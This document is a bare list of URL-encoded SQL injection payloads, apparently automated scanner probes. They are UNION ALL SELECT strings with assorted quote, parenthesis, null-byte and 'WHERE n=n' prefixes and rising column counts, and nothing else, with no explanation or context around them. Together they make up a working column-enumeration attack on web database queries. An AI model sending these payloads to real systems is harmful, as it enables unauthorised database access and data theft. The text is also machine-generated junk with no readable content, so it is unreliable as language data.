-7948%25%27%29%29%29%20UNION%20ALL%20SELECT%202686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%2C2686%23 -1737%25%27%29%29%29%20UNION%20ALL%20SELECT%202098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%2C2098%23 -8006%25%27%29%29%29%20UNION%20ALL%20SELECT%201723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723%23 -8257%25%27%29%29%29%20UNION%20ALL%20SELECT%203259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%23 -4791%25%27%29%29%29%20UNION%20ALL%20SELECT%209814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%2C9814%23 -3851%25%27%29%29%29%20UNION%20ALL%20SELECT%205151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%2C5151%23 -9970%25%27%29%29%29%20UNION%20ALL%20SELECT%208190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%2C8190%23 -9804%25%27%29%29%29%20UNION%20ALL%20SELECT%204077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%23 -7354%25%27%29%29%29%20UNION%20ALL%20SELECT%202719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%2C2719%23 -6544%25%27%20UNION%20ALL%20SELECT%206898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%2C6898%23 -9182%25%27%20UNION%20ALL%20SELECT%202747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%2C2747%23 -9259%25%27%20UNION%20ALL%20SELECT%201511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%2C1511%23 -1773%25%27%20UNION%20ALL%20SELECT%201102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%2C1102%23 -8410%25%27%20UNION%20ALL%20SELECT%206478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%2C6478%23 -5135%25%27%20UNION%20ALL%20SELECT%209181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%23 -5449%25%27%20UNION%20ALL%20SELECT%201769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%23 -8681%25%27%20UNION%20ALL%20SELECT%207992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%2C7992%23 -2709%25%27%20UNION%20ALL%20SELECT%204672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%2C4672%23 -1589%25%27%20UNION%20ALL%20SELECT%202566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%23 -4327%00%27%29%20UNION%20ALL%20SELECT%208066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%23 -4652%00%27%29%20UNION%20ALL%20SELECT%209917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%2C9917%23 -8779%00%27%29%20UNION%20ALL%20SELECT%205252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%2C5252%23 -8724%00%27%29%20UNION%20ALL%20SELECT%203906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%2C3906%23 -6886%00%27%29%20UNION%20ALL%20SELECT%202280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%23 -9847%00%27%29%20UNION%20ALL%20SELECT%203077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%2C3077%23 -4272%00%27%29%20UNION%20ALL%20SELECT%203933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%2C3933%23 -7220%00%27%29%20UNION%20ALL%20SELECT%201010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%2C1010%23 -9070%00%27%29%20UNION%20ALL%20SELECT%203940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%2C3940%23 -8963%00%27%29%20UNION%20ALL%20SELECT%207081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%23 -6563%00%27%20UNION%20ALL%20SELECT%204554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%2C4554%23 -4610%00%27%20UNION%20ALL%20SELECT%202433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%2C2433%23 -9483%00%27%20UNION%20ALL%20SELECT%208901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%2C8901%23 -4336%00%27%20UNION%20ALL%20SELECT%205724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%23 -1112%00%27%20UNION%20ALL%20SELECT%203265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%2C3265%23 -6313%00%27%20UNION%20ALL%20SELECT%202577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%2C2577%23 -1551%00%27%20UNION%20ALL%20SELECT%208909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%2C8909%23 -1942%00%27%20UNION%20ALL%20SELECT%202323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%2C2323%23 -2835%00%27%20UNION%20ALL%20SELECT%209794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%2C9794%23 -4324%00%27%20UNION%20ALL%20SELECT%206490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%23 -3144%27%29%20WHERE%202200%3D2200%20UNION%20ALL%20SELECT%202200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%2C2200%23 -6957%27%29%20WHERE%208342%3D8342%20UNION%20ALL%20SELECT%208342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%2C8342%23 -3708%27%29%20WHERE%207311%3D7311%20UNION%20ALL%20SELECT%207311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%2C7311%23 -8169%27%29%20WHERE%206364%3D6364%20UNION%20ALL%20SELECT%206364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%2C6364%23 -7816%27%29%20WHERE%202660%3D2660%20UNION%20ALL%20SELECT%202660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%2C2660%23 -4631%27%29%20WHERE%208256%3D8256%20UNION%20ALL%20SELECT%208256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%23 -1055%27%29%20WHERE%206029%3D6029%20UNION%20ALL%20SELECT%206029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%2C6029%23 -2742%27%29%20WHERE%203118%3D3118%20UNION%20ALL%20SELECT%203118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%2C3118%23 -5446%27%29%20WHERE%206444%3D6444%20UNION%20ALL%20SELECT%206444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%2C6444%23 -6543%27%29%20WHERE%204772%3D4772%20UNION%20ALL%20SELECT%204772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%2C4772%23 -4966%22%29%20WHERE%202189%3D2189%20UNION%20ALL%20SELECT%202189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%2C2189%23 -4359%22%29%20WHERE%205366%3D5366%20UNION%20ALL%20SELECT%205366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%2C5366%23 -3993%22%29%20WHERE%204056%3D4056%20UNION%20ALL%20SELECT%204056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%2C4056%23 -1207%22%29%20WHERE%206819%3D6819%20UNION%20ALL%20SELECT%206819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%2C6819%23 -1977%22%29%20WHERE%205986%3D5986%20UNION%20ALL%20SELECT%205986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%2C5986%23 -6296%22%29%20WHERE%204034%3D4034%20UNION%20ALL%20SELECT%204034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%2C4034%23 -6820%22%29%20WHERE%209753%3D9753%20UNION%20ALL%20SELECT%209753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%23 -3135%22%29%20WHERE%205804%3D5804%20UNION%20ALL%20SELECT%205804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%23 -3066%22%29%20WHERE%208483%3D8483%20UNION%20ALL%20SELECT%208483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%2C8483%23 